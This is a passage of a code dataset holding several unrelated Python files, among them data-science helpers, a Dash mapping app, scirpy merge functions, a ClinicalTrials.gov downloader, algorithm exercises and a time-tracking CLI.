comparison_df = df1.merge(df2,\n indicator=True,\n how='outer')\n if which is None:\n diff_df = comparison_df[comparison_df['_merge'] != 'both']\n else:\n diff_df = comparison_df[comparison_df['_merge'] == which]\n return diff_df\n\n\ndef sort_columns_by_median(df):\n cols = df.median().sort_values(ascending=False).index\n return df[cols]\n\n\ndef remove_all_zero_columns(df):\n is_zero = df.max() != 0\n is_zero = is_zero[is_zero].index\n return df[is_zero]\n\n\ndef is_ms_file(fn):\n if (fn.lower().endswith('.mzxml')) or \\\n (fn.lower().endswith('.mzml')) or \\\n (fn.lower().endswith('.mzhdf')) or \\\n (fn.lower().endswith('.feather')):\n return True\n else:\n return False\n\ndef get_ms_files_from_results(results):\n ms_files = results[['ms_path', 'ms_file']].drop_duplicates()\n ms_files = [os.path.join(ms_path, ms_file) for ms_path, ms_file in ms_files.values]\n return 
ms_files","sub_path":"ms_mint/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"375344962","text":"'''\nCreate toy data\n\n'''\nimport time\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import rv_discrete\nimport matplotlib.pyplot as plt\nimport argparse\nimport os\nfrom sklearn.model_selection import train_test_split\n\ndef draw_from_discrete_pmf(states, p, duration):\n ''' Sample from a discrete probability mass function\n\n Args\n ------\n states : list\n List of states\n p : tuple\n Probabilities for each state\n duration : int\n Duration or \"dwell time\" of this state\n \n Returns\n -------\n samples : 1D array, size (duration,)\n Each entry is an integer indicator drawn from discrete pmf\n '''\n drawn_state = np.zeros(duration)\n drawn_state[:] = rv_discrete(name='custm', values=(states, p)).rvs(size=1)\n return drawn_state\n\ndef generate_state_sequence(T, states, init_proba_K, trans_proba_KK, duration = 2): \n ''' Generate hidden state assignments following a semi-Markov model\n\n Args\n ------ \n T : length of time series (scalar) \n init_proba_K : tuple of initial probabilities\n states : list of states\n \n Returns\n -------\n T x 1 samples drawn from the Markov model\n '''\n # define some initial probabilities of each state\n init_state = draw_from_discrete_pmf(states, init_proba_K, duration)\n\n # draw T samples from the above model\n drawn_states = []\n \n # draw T samples from the above model\n while len(drawn_states)<=T:\n if len(drawn_states)==0:\n drawn_states.extend(init_state)\n else:\n z_prev = drawn_states[-1]\n drawn_states.extend(draw_from_discrete_pmf(states, trans_proba_KK[int(z_prev)], duration))\n\n drawn_states = np.asarray(drawn_states[:T])\n \n return drawn_states\n\ndef generate_data_sequences_given_state_sequences(\n state_sequences_TN, possible_states, mean_KD, stddev_KD):\n ''' Generate data given states\n\n Returns\n ------\n data_DTN : 3d array, (n_dims, n_timessteps, n_sequences)\n Contains observed features for each timestep\n Any timestep with missing data will be assigned nan\n '''\n K, D = mean_KD.shape\n T, N = state_sequences_TN.shape\n data_DTN = np.nan + np.zeros((D, T, N))\n y_N = np.zeros(N)\n \n for n in range(N):\n for state in possible_states:\n cur_bin_mask_T = state_sequences_TN[:,n] == state\n C = np.sum(cur_bin_mask_T)\n \n data_DTN[:, cur_bin_mask_T, n] = np.random.normal(mean_KD[state], stddev_KD[state], size=C).T\n \n if (state == 2)&(C>0):\n y_N[n]=1\n \n return data_DTN, y_N\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--Tmax', type=int, default=110,\n help='Length of time series, default : 100')\n parser.add_argument('--Nmax', type=int, default=5000, help=\"Max number of sequences to generate.\")\n parser.add_argument('--seed', type=int, default=1111,\n help='random seed')\n parser.add_argument('--output_dir', type=str, default='simulated_data/',\n help='dir in which to save generated dataset')\n args = parser.parse_args()\n \n # Number of time steps\n# Tmin = args.Tmin\n Tmax = args.Tmax\n\n # define number of channels in each sequence \n D = 1\n n_states = 3\n \n # define total number of sequences\n Nmax = args.Nmax\n\n # define 2 states {0 : Background, 1 : state A}\n states = np.arange(n_states)\n init_proba_K = (0.5, 0.49, 0.01)\n\n # Create a probability transition matrix for the 3 states\n trans_proba_KK = [(0.5, 0.5, 0.0),\n 
(0.492, 0.5, 0.008),\n (0.0, 1.0, 0.0)]\n\n# mean_overheat = 3\n\n# stddev_KD = np.ones((n_states, D))\n# stddev_KD[2] = 0.3\n\n# mean_KD = np.zeros((n_states, D))\n# mean_KD[0, 0] = 0\n# mean_KD[1, 0] = -1\n# mean_KD[2, 0] = mean_overheat\n \n mean_overheat = 5\n\n stddev_KD = np.ones((n_states, D))\n stddev_KD[2] = 0.3\n\n mean_KD = np.zeros((n_states, D))\n mean_KD[0, 0] = -4\n mean_KD[1, 0] = -5\n mean_KD[2, 0] = mean_overheat\n\n # define how long to hold a state\n duration = 2\n \n # set random seed to regenerate the same data for reproducability\n np.random.seed(args.seed)\n \n # create a synthetic dataset of sequences and labels. \n state_sequences_TN = np.nan + np.zeros([Tmax, Nmax])\n start_time_sec = time.time()\n T = Tmax # fix the number of time-steps for all sequences\n \n \n for j in range(Nmax):\n# T = rs.randint(low=Tmin, high=Tmax+1)\n state_sequences_TN[:T,j] = generate_state_sequence(T, states, init_proba_K, \n trans_proba_KK, \n duration)\n\n # generate the time series data from the state sequence\n data_DTN, y_N = generate_data_sequences_given_state_sequences(\n state_sequences_TN, states, mean_KD, stddev_KD)\n N = data_DTN.shape[2]\n\n seq_list = list()\n feature_columns = ['temperature']\n for n in range(N):\n mask_T = np.isfinite(data_DTN[0, :, n])\n tidy_df = pd.DataFrame(data_DTN[:, :, n][:, mask_T].T, columns=feature_columns)\n tidy_df['timestep'] = np.arange(np.sum(mask_T))\n tidy_df['sequence_id'] = n\n tidy_df['did_overheat_binary_label'] = int(y_N[n])\n seq_list.append(tidy_df)\n\n tidy_df = pd.concat(seq_list)\n tidy_pertstep_df = tidy_df[['sequence_id', 'timestep'] + feature_columns].copy()\n tidy_perseq_df = tidy_df[['sequence_id', 'did_overheat_binary_label']]\n tidy_perseq_df = tidy_perseq_df.drop_duplicates().copy()\n\n tidy_pertstep_df.to_csv(\n os.path.join(args.output_dir, 'cnn_features_per_tstep.csv'),\n index=False)\n tidy_perseq_df.to_csv(\n os.path.join(args.output_dir, 'cnn_outcomes_per_seq.csv'),\n index=False)\n\n print(\"Wrote features to:\")\n print(\n os.path.join(args.output_dir, 'cnn_features_per_tstep.csv'))\n print(\"Wrote outcomes to:\")\n print(\n os.path.join(args.output_dir, 'cnn_outcomes_per_seq.csv'))\n\n \n # create a plot showing examples of positive and negative labels in the simulated data\n # get examples of time series sequence with label 0 and 1 and plot it\n inds_label_0 = np.flatnonzero(y_N==0)\n inds_label_1 = np.flatnonzero(y_N==1)\n \n \n print('Total number of sequences : %s'%(len(y_N)))\n print('Number of negative sequences : %s'%(len(inds_label_0)))\n print('Number of positive sequences : %s'%(len(inds_label_1)))\n \n # plot example sequence\n fontsize = 10\n \n inds_list = [inds_label_0, inds_label_1]\n y_labels = ['y=0', 'y=1']\n \n for i in range(len(y_labels)):\n f,axs = plt.subplots(2,1, sharex=True, figsize=(15, 5))\n axs[0].plot(range(Tmax), state_sequences_TN[:, inds_list[i][0]], '.')\n axs[0].set_ylabel('State', fontsize = fontsize)\n axs[0].set_title('State Sequence for %s'%y_labels[i])\n axs[0].set_yticks(np.arange(3))\n axs[0].set_ylim([-.5, 2.5])\n axs[1].plot(range(Tmax), data_DTN[:,:,inds_list[i][0]].T)\n axs[1].set_xlim([0, Tmax])\n axs[1].set_ylim([-10, 10])\n axs[1].set_xlabel('Time', fontsize = fontsize)\n axs[1].set_ylabel('Temperature (deg C)', fontsize = fontsize)\n axs[1].set_title('Generated Sequence for %s'%y_labels[i])\n\n f.savefig(os.path.join(args.output_dir, 'cnn_example_%s_sequence.png'%y_labels[i]))\n 
\n","sub_path":"scripts/toy_overheat/standardize_dataset/make_dataset_for_cnn.py","file_name":"make_dataset_for_cnn.py","file_ext":"py","file_size_in_byte":7576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"433672687","text":"# Uses python3\nimport sys\n\n\ndef merge_sort(a, left, right):\n if left >= right:\n return 0\n\n mid = (left + right) // 2\n\n left_count = merge_sort(a, left, mid)\n right_count = merge_sort(a, mid + 1, right)\n\n # count records the inversions discovered while merging the two halves\n count = 0\n # copy holds the sorted slice of a from left to right\n copy = (right - left + 1) * [0]\n # i and j are the starting points of the left and right halves\n i, j = left, mid+1\n k = 0\n while i <= mid and j <= right:\n # inversion found: count the inversion pairs and move the element from the right half (the smaller value) into copy\n if a[i] > a[j]:\n copy[k] = a[j]\n j += 1\n count += mid + 1 - i\n # no inversion: move the element from the left half into copy\n else:\n copy[k] = a[i]\n i += 1\n k += 1\n # once one half is exhausted, copy the remainder of the other half into copy\n while i <= mid:\n copy[k] = a[i]\n i += 1\n k += 1\n while j <= right:\n copy[k] = a[j]\n j += 1\n k += 1\n for i in range(left, right + 1):\n # a is written starting at left, copy is read starting at 0\n a[i] = copy[i-left]\n return left_count + right_count + count\n\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n, *a = list(map(int, input.split()))\n # n, *a = list(map(int, input().split()))\n print(merge_sort(a, 0, len(a) - 1))\n\n","sub_path":"C1W4 Divide and Conquer/4_Number_of_Inversions.py","file_name":"4_Number_of_Inversions.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"113433361","text":"import turtle as t\n\n\ndef rectangle(horizontal, vertical, color):\n t.pendown()\n t.pensize(1)\n t.color(color)\n t.begin_fill()\n for counter in range(1, 3):\n t.forward(horizontal)\n t.right(90)\n t.forward(vertical)\n t.right(90)\n t.end_fill()\n t.penup()\n\ndef setup():\n t.penup()\n t.speed('slow')\n t.bgcolor('Dodger blue')\n\ndef draw_robot():\n t.goto(-100,-150)\n rectangle(50, 20, 'blue')\n t.goto(-30, -150)\n rectangle(50, 20, 'blue')\n\ndef main():\n setup()\n draw_robot()\n t.hideturtle()\n t.mainloop()\n\nif __name__ == \"__main__\":\n main()","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"604984468","text":"\n# coding: utf-8\n\n# In[11]:\n\n\n# Dash\n\nimport pandas as pd\nimport dash\nfrom dash.dependencies import Input, Output, State, Event\nimport dash_html_components as html\nimport dash_core_components as dcc\nimport plotly.plotly as py\nfrom plotly import graph_objs as go\nfrom plotly.graph_objs import *\nimport dash_table_experiments as dt\n\nMAPBOX_KEY='pk.eyJ1Ijoia2V2YWxzaGFoIiwiYSI6ImNqbW1nbG90MDBhNTQza3IwM3pvd2I3bGUifQ.dzdTsg69SdUXY4zE9s2VGg'\n\nfrom dotenv import find_dotenv, load_dotenv\nimport os\n\n# Loads the dotenv file into the environment. 
This exposes the variables in that\n# file as though they were actual environment variables to the os module.\n#load_dotenv(find_dotenv())\n\n#MAPBOX_KEY = os.environ.get(\"MAPBOX_KEY\")\n\n\n# In[12]:\n\n\napp = dash.Dash()\n\n\n# In[13]:\n\n\n# Title the app.\napp.title = \"Stroom Product Prototype\"\n\n\n# In[14]:\n\n\n# Layout\n\n# Boostrap CSS.\napp.css.append_css({\n \"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\"\n})\n\n# Extra Dash styling.\napp.css.append_css({\n \"external_url\": 'https://codepen.io/chriddyp/pen/bWLwgP.css'\n})\n\n# JQuery is required for Bootstrap.\napp.scripts.append_script({\n \"external_url\": \"https://code.jquery.com/jquery-3.2.1.min.js\"\n})\n\n# Bootstrap Javascript.\napp.scripts.append_script({\n \"external_url\": \"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js\"\n})\n\n\n# In[15]:\n\n\n# Read Pandas dataframe\nEmpComm1 = pd.read_pickle('EmpComm1.pickle')\nEmpComm1.tail(5)\n\n\n# In[27]:\n\n\n# Company list\nCompany_List = sorted(list(EmpComm1['Company'].unique()))\nLocation_List = sorted(list(EmpComm1['OfficeLocation'].unique()))\n\n# Team or Grouping List\nTeam_List = list(EmpComm1['Team'].unique())\n\n\n# In[28]:\n\n\n# App Layout\n\napp.layout = html.Div([\n \n html.H3(\"Organization View\"),\n dcc.Dropdown(\n id='company-select',\n options=[{'label': i, 'value': i} for i in Company_List],\n value='Company A'\n ),\n \n dcc.Dropdown(\n id='location-select',\n options=[{'label': i, 'value': i} for i in Location_List],\n value='Location 1'\n ),\n \n dcc.Graph(id='map-graph'),\n \n dt.DataTable(\n # Initialise the rows\n rows=[{}],\n row_selectable=True,\n filterable=True,\n sortable=True,\n selected_row_indices=[],\n max_rows_in_viewport=6,\n id='table'\n )\n\n])\n\n\n# In[29]:\n\n\n@app.callback(Output(\"map-graph\", \"figure\"),\n [\n Input(\"company-select\", \"value\")\n ]\n )\ndef update_graph(selected_value):\n \n # Filter the dataframe with selected value\n Comp_data = EmpComm1[EmpComm1['Company'] == selected_value]\n \n colors = {\n 'R&D':'red', \n 'Engineering':'blue', \n 'Sales':'green', \n 'Marketing':'black', \n 'Customer Support':'grey',\n 'Legal':'yellow',\n 'Operations':'violet',\n 'Human Resources':'pink',\n 'Accounting':'chocolate4'\n }\n \n data = [] \n # Plot home location and map commute to work. 
\n # Create a data dictionary of lat and lon to plot\n \n # Color by category group by\n for i, row in Comp_data.iterrows():\n \n hlat, hlong = row['HomeLocation']\n time = row['Duration']\n team = row['Team']\n \n data.append({\n \"type\": \"scattermapbox\",\n \"lat\": [hlat],\n \"lon\": [hlong],\n \"name\": \"Home Location\",\n \"text\": time,\n \"hoverinfo\": time,\n \"mode\": \"markers\",\n \"marker\": {\n \"symbol\": \"circle\",\n \"color\": colors[team],\n \"size\": 6,\n \"opacity\": 0.7\n }\n }\n \n ) \n \n for i, row in Comp_data.iterrows():\n \n wlat, wlong = row['WorkLocation']\n \n data.append({\n \"type\": \"scattermapbox\",\n \"lat\": [wlat],\n \"lon\": [wlong],\n \"name\": \"Work Location\",\n \"text\": time,\n \"mode\": \"markers\",\n \"marker\": {\n \"symbol\": \"suitcase\",\n \"color\": \"black\",\n \"size\": 12,\n \"opacity\": 0.7\n }\n }\n \n ) \n \n layout = {\n \"autosize\": True,\n \"hovermode\": \"closest\",\n \"title\": \"Distribution of Workforce\",\n \"showlegend\": False,\n \"mapbox\": {\n \"accesstoken\": MAPBOX_KEY,\n \"bearing\": 0,\n \"center\": {\n \"lat\": 37.77,\n \"lon\": -122.43\n },\n \"pitch\": 0,\n \"zoom\": 10,\n \"style\": \"outdoors\",\n }\n } \n \n return {\"data\": data, \"layout\": layout}\n\n@app.callback(Output('table', 'rows'),\n [\n Input(\"company-select\", \"value\")\n ]\n )\ndef update_datatable(selected_value):\n \"\"\"\n For user selections, return the relevant table\n \"\"\"\n # Filter the dataframe with selected value\n Comp_data = EmpComm1[EmpComm1['Company'] == selected_value]\n Comp_data_subset = Comp_data[['EmployeeID',\n 'First',\n 'Last',\n 'Team',\n 'Transportation',\n 'Distance (mi)',\n 'Duration',\n 'Cost(USD)']]\n \n return Comp_data_subset.to_dict('records')\n\n\n# In[9]:\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"30916948","text":"from textwrap import indent\nfrom typing import Union, List, Dict\nfrom anndata import AnnData\nfrom ..io._convert_anndata import (\n _sanitize_anndata,\n to_airr_cells,\n from_airr_cells,\n)\nfrom ..io._datastructures import AirrCell\nfrom ..io._util import _check_upgrade_schema\nfrom scanpy import logging\nimport itertools\nimport pandas as pd\n\n\n@_check_upgrade_schema(check_args=(0, 1))\ndef merge_airr_chains(adata: AnnData, adata2: AnnData) -> None:\n \"\"\"\n Merge two AnnData objects with :term:`IR` information (e.g. BCR with TCR).\n\n Decomposes the IR information back into :class:`scirpy.io.AirrCell` objects\n and merges them on a chain-level. If both objects contain the same cell-id, and\n the same chains, the corresponding row in `adata.obs` will be unchanged.\n If both objects contain the same cell-id, but different chains, the chains\n will be merged into a single cell such that it can be annotated as\n :term:`ambiguous` or :term:`multi-chain`\n if appropriate. If a cell contains both TCR and BCR chains, they will both\n be kept and can be identified as `ambiguous` using the :func:`scirpy.tl.chain_qc`\n function.\n\n The function performs a \"left join\", i.e. all cells not present in `adata` will\n be discarded. 
Of `adata2` the function only retains information from `obs`.\n\n To simply add IR information onto an existing `AnnData` object with transcriptomics\n data, see :func:`~scirpy.pp.merge_with_ir` (this function can do this, too, but\n `merge_with_ir` is more efficient).\n\n Modifies `adata` inplace.\n\n Parameters\n ----------\n adata\n first AnnData object containing IR information\n adata2\n second AnnData object containing IR information\n \"\"\"\n ir_objs1 = to_airr_cells(adata)\n ir_objs2 = to_airr_cells(adata2)\n # Compute `include_fields` to avoid including fields that are part of\n # empty airr cells as part of the rearrangement standard, but not included\n # in the original anndata object.\n include_fields = set(\n x.split(\"_\", maxsplit=3)[-1] if x.startswith(\"IR_\") else x\n for x in itertools.chain(adata.obs.columns, adata2.obs.columns)\n )\n cell_dict: Dict[str, AirrCell] = dict()\n for cell in itertools.chain(ir_objs1, ir_objs2):\n try:\n tmp_cell = cell_dict[cell.cell_id]\n except KeyError:\n cell_dict[cell.cell_id] = cell\n else:\n # this is a legacy operation. With adatas generated with scirpy\n # >= 0.7 this isn't necessary anymore, as all chains are preserved.\n tmp_cell[\"multi_chain\"] = bool(tmp_cell[\"multi_chain\"]) | bool(\n cell[\"multi_chain\"]\n )\n for tmp_chain in cell.chains:\n tmp_cell.add_chain(tmp_chain)\n # add cell-level attributes\n tmp_cell.update(cell)\n\n # remove duplicate chains\n # https://stackoverflow.com/questions/9427163/remove-duplicate-dict-in-list-in-python\n for cell in cell_dict.values():\n cell._chains = [dict(t) for t in set(tuple(d.items()) for d in cell.chains)]\n\n # only keep entries that are in `adata` and ensure consistent ordering\n adata.obs = from_airr_cells(\n cell_dict.values(), include_fields=include_fields\n ).obs.reindex(adata.obs_names)\n\n\n@_check_upgrade_schema(check_args=(1,))\ndef merge_with_ir(\n adata: AnnData, adata_ir: AnnData, on: Union[List[str], None] = None, **kwargs\n) -> None:\n \"\"\"Merge adaptive immune receptor (:term:`IR`) data with transcriptomics data into a\n single :class:`~anndata.AnnData` object.\n\n :ref:`Reading in IR data` results in an :class:`~anndata.AnnData`\n object with IR information stored in `obs`. Use this function to merge\n it with another :class:`~anndata.AnnData` containing transcriptomics data.\n To add additional IR data on top of on top of an :class:`~anndata.AnnData`\n object that already contains IR information (e.g. :term:`BCR` on top of\n :term:`TCR` data.), see :func:`~scirpy.pp.merge_airr_chains`.\n\n Merging keeps all objects (e.g. `neighbors`, `umap`) from `adata` and integrates\n `obs` from `adata_ir` into `adata`. Everything other than `.obs` from `adata_ir`\n will be discarded.\n\n This function is a thin wrapper around :func:`pandas.merge`. The function performs\n a \"left join\", i.e. all cells not present in `adata` will be discarded.\n\n Modifies `adata` inplace.\n\n Parameters\n ----------\n adata\n AnnData with the transcriptomics data. Will be modified inplace.\n adata_ir\n AnnData with the adaptive immune receptor (IR) data\n on\n Merge on columns in addition to 'index'. 
Defaults to \"batch\" if present in\n both `obs` data frames.\n **kwargs\n Passed to :func:`pandas.merge`.\n \"\"\"\n if len(kwargs):\n raise ValueError(\n \"Since scirpy v0.5, this function always performs a 'left' merge \"\n \"on the index and does not accept any additional parameters any more.\"\n )\n if not adata.obs_names.is_unique:\n raise ValueError(\"obs names of `adata` need to be unique for merging.\")\n if not adata_ir.obs_names.is_unique:\n raise ValueError(\"obs_names of `adata_ir` need to be unique for merging.\")\n if on is None and \"batch\" in adata.obs.columns and \"batch\" in adata_ir.obs.columns:\n on = [\"batch\"]\n\n if \"has_ir\" in adata.obs.columns:\n raise ValueError(\n \"It seems you already have immune receptor (IR) data in `adata`. \"\n \"Please use `ir.pp.merge_airr_chains` instead. \"\n )\n\n # Since pandas does not support both merge on index and columns, we\n # need to name the index, and use the index name in `on`.\n orig_index_name = adata.obs.index.name\n if \"obs_names\" in adata.obs.columns or \"obs_names\" in adata_ir.obs.columns:\n raise ValueError(\"This doesn't work if there's a column named 'obs_names'. \")\n adata.obs.index.name = \"obs_names\"\n adata_ir.obs.index.name = \"obs_names\"\n if on is None:\n on = list()\n on.insert(0, \"obs_names\")\n\n adata.obs = adata.obs.merge(\n adata_ir.obs, how=\"left\", on=on, validate=\"one_to_one\", **kwargs\n )\n\n adata.obs.index.name = orig_index_name\n\n _sanitize_anndata(adata)\n","sub_path":"scirpy/_preprocessing/_merge_adata.py","file_name":"_merge_adata.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"499105319","text":"\"\"\"\n Function to Interact with ClinicalTrials.gov\n\n @author: Riccardo Miotto \n\n Modified on Sep 15th 2014\n @author: Praveen Chandar < (at) columbia (dot) edu >\n\"\"\"\nimport re\nfrom ctgov.utility.web import download_web_data\nfrom ctgov.utility.log import strd_logger\n\n\nlog = strd_logger('ctgov-fetch')\n\n\ndef get_clinical_trials():\n \"\"\"\n Obtains the latest list of all clinical trials from clinicaltrials.gov\n\n :return:\n \"\"\"\n url = 'http://clinicaltrials.gov/ct2/crawl'\n html = download_web_data(url)\n pages = re.findall(r'href=\"/ct2/crawl/(\\d+)\"', html)\n lnct = set()\n for p in pages:\n html = download_web_data('%s/%s' % (url, p))\n ct = re.findall(r'href=\"/ct2/show/(NCT\\d+)\"', html)\n lnct |= set(ct)\n return sorted(lnct)\n\n\ndef get_ct_rawdata(nctid, data_path):\n \"\"\"\n Downloads the specified trial from clinicaltrials.gov and\n stores the XML file in the specified location.\n\n :param nctid:\n :param data_path:\n :return:\n \"\"\"\n url = 'http://clinicaltrials.gov/show/%s?displayxml=true' % nctid\n raw_data = download_web_data(url)\n out_path = data_path + '/' + nctid + '.xml'\n try:\n fid = open(out_path, 'w')\n fid.write(raw_data)\n fid.close()\n return True\n except Exception as e:\n log.error(e)\n return False","sub_path":"util/url_fetch.py","file_name":"url_fetch.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"415001841","text":"try:\n resultado = 10 / 0\nexcept ZeroDivisionError:\n print( 'Error: Estas dividiendo entre 0' )\n\n\nlista = [1,2,3,4,5]\ntry:\n print( lista[10] )\nexcept IndexError:\n print( 'Error: El indice esta fuera del rango' )\n\n\ncolores = { 'rojo':'red', 'verde':'green', 'negro':'black' }\ntry:\n print( colores['blanco'] 
colores = { 'rojo':'red', 'verde':'green', 'negro':'black' }\ntry:\n print( colores['blanco'] )\nexcept KeyError:\n print( 'Error: The key you are trying to access is not in the dictionary' )\n\n\ntry:\n resultado = 15 + '20'\nexcept TypeError:\n print( 'Error: You can only add/concatenate data of the same type; convert the int to a string or the string to an int' )\n\n\n\ndef agregar_una_vez( lista, num ):\n try:\n if num not in lista:\n lista.append( num )\n else:\n raise ValueError('Element already in the list')\n except ValueError:\n print( 'Error: Cannot add duplicate elements => {}'.format( num ) )\n\nelementos = [1, 5, -2]\nagregar_una_vez( elementos, 10 )\nagregar_una_vez( elementos, -2 )\nagregar_una_vez( elementos, \"Hola\" )\nprint( elementos )","sub_path":"016SectionPractice.py","file_name":"016SectionPractice.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"301820874","text":"# Copyright (c) 2012-2013 Oleksandr Sviridenko\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\n\nfrom les.utils import logging\nfrom les.drivers import drivers_pb2\nfrom les.drivers.local_elimination_driver import LocalEliminationDriver\nfrom les.drivers.oracle_driver.oracle_driver import OracleDriver\nfrom les.drivers.greedy_driver.greedy_driver import GreedyDriver\nfrom les.drivers.preproc_driver.preproc_driver import PreprocDriver\n\n\nLOCAL_ELIMINATION_DRIVER = drivers_pb2.LOCAL_ELIMINATION_DRIVER\nORACLE_DRIVER = drivers_pb2.ORACLE_DRIVER\nGREEDY_DRIVER = drivers_pb2.GREEDY_DRIVER\nCOMPL_DIFF_DRIVER = drivers_pb2.PREPROC_DRIVER\n\n_DRIVERS_TABLE = {\n LOCAL_ELIMINATION_DRIVER: LocalEliminationDriver,\n ORACLE_DRIVER: OracleDriver,\n GREEDY_DRIVER: GreedyDriver,\n COMPL_DIFF_DRIVER: PreprocDriver\n}\n\ndef get_instance_of(driver_id, *args, **kwargs):\n if not isinstance(driver_id, int):\n raise TypeError()\n if not driver_id in _DRIVERS_TABLE:\n return None\n driver_class = _DRIVERS_TABLE[driver_id]\n return driver_class(*args, **kwargs)\n","sub_path":"src/main/python/les/drivers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"442664765","text":"def main():\n\timport time\n\tfrom pprint import pprint\n\n\tstartTime = time.time()\n\n\tfile = open(\"input\", \"r\")\n\tdata = file.readlines()\n\tfile.close()\n\n\tdef is_it_arithmetic_sequence(sequence):\n\t\tdiff = int(sequence[1]) - int(sequence[0])\n\t\tprev = int(sequence[0]) - diff\n\t\tfor i in sequence:\n\t\t\tif not prev + diff == int(i):\n\t\t\t\treturn False\n\t\t\tprev = int(i)\n\t\treturn True\n\n\t# print(is_it_arithmetic_sequence(\"1234\"))\n\n\tcurrentTime = \"1200\"\n\tpeopleTime = \"1200\"\n\tpeopleTimeList = []\n\tsequence_count = 0\n\tfor i in range(int(data[0]) + 1):\n\t\t# print(time[:-2])\n\t\t# print(time[-2:])\n\t\tcurrentTime = str(int(currentTime[:-2]) + (i // ((int(currentTime[:-2]) - 11) * 60))) + currentTime[-2:]\n\t\t# currentTime = str(int(currentTime) + (i % 
60))\n\t\tpeopleTime = str(int(currentTime) + (i % 60))\n\t\t# if int(peopleTime[:-2]) > 12:\n\t\t# \tif not peopleTime[:-2] == \"12\":\n\t\t# \t\tpeopleTime = str(int(peopleTime[:-2]) - 12) + peopleTime[-2:]\n\t\tif int(peopleTime[:-2]) > 12:\n\t\t\tpeopleTime = str(int(peopleTime[:-2]) % 12) + peopleTime[-2:]\n\t\t# if int(peopleTime[:-2]) - 12 < 10 or int(peopleTime[:-2]) - 12 == 0:\n\t\t# \tpeopleTime = \"0\" + currentTime\n\t\tprint(peopleTime[:-2] + \":\" + peopleTime[-2:], end=\"\")\n\t\tif is_it_arithmetic_sequence(peopleTime):\n\t\t\tsequence_count += 1\n\t\t\tprint(\" *\", end=\"\")\n\t\t\tpeopleTimeList.append(peopleTime[:-2] + \":\" + peopleTime[-2:] + \" *\")\n\t\tprint(\" (\" + str(i) + \"/\" + str(int(data[0])) + \") \" + str(i / int(data[0]) * 100) + \"%\")\n\n\tprint(\"\\n\" + str(sequence_count))\n\tpprint(peopleTimeList)\n\n\tendTime = time.time()\n\tprint(\"Runtime: \" + str(endTime - startTime))\n\n\treturn peopleTimeList\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"2017/junior/j4 - favourate times/ft-original.py","file_name":"ft-original.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"306761326","text":"import numpy as np\nimport numba\n\n@numba.njit(cache=True)\ndef bootstrapCI(data: np.ndarray, bootstraps: int = 10000, seed: int = 0):\n np.random.seed(seed)\n assert len(data.shape) == 2\n seeds, measurements = data.shape\n\n out = np.empty((3, measurements))\n for i in range(measurements):\n bs = np.empty(bootstraps)\n for j in range(bootstraps):\n sub = np.random.choice(data[:, i], size=seeds, replace=True)\n bs[j] = np.mean(sub)\n\n out[0, i] = np.percentile(bs, 2.5)\n out[1, i] = np.mean(data[:, i])\n out[2, i] = np.percentile(bs, 97.5)\n\n return out\n","sub_path":"src/analysis/confidence_intervals.py","file_name":"confidence_intervals.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"442455845","text":"from __future__ import print_function\nfrom datetime import date\nimport dateutil\nimport isodate\nimport helpers\n\n\ndef list_entries(args, config, app_data):\n today_raw = date.today()\n today = today_raw.strftime('%Y-%m-%d')\n\n if args.start or args.end:\n # Handle --start and --end\n if args.start and not args.end:\n from_date = args.start\n\n if from_date < today:\n to_date = today\n else:\n to_date = from_date\n elif not args.start and args.end:\n to_date = args.end\n\n if to_date > today:\n from_date = today\n else:\n from_date = to_date\n else:\n from_date = args.start\n to_date = args.end\n else:\n # List defaults to current day\n from_date = today\n to_date = today\n\n # Periods will override --start and --end\n if args.period and helpers.resolve_period(args.period):\n period = helpers.resolve_period(args.period)\n from_date = period['start']\n to_date = period['end']\n\n helpers.time_entry_list(from_date, to_date, app_data['clockify'])\n\n\ndef new_entry(args, config, app_data):\n if 'hours' not in args or not args.hours:\n print('Specify hours.')\n return\n\n entry = app_data['clockify'].create_entry(args.id, args.comments, args.hours, args.date)\n\n if 'message' in entry and 'code' in entry:\n print(entry['message'])\n return\n\n print(helpers.entry_bullet_point(entry))\n\n print(\"Time entry created.\")\n\n\ndef update_entry(args, config, app_data):\n changed = False\n
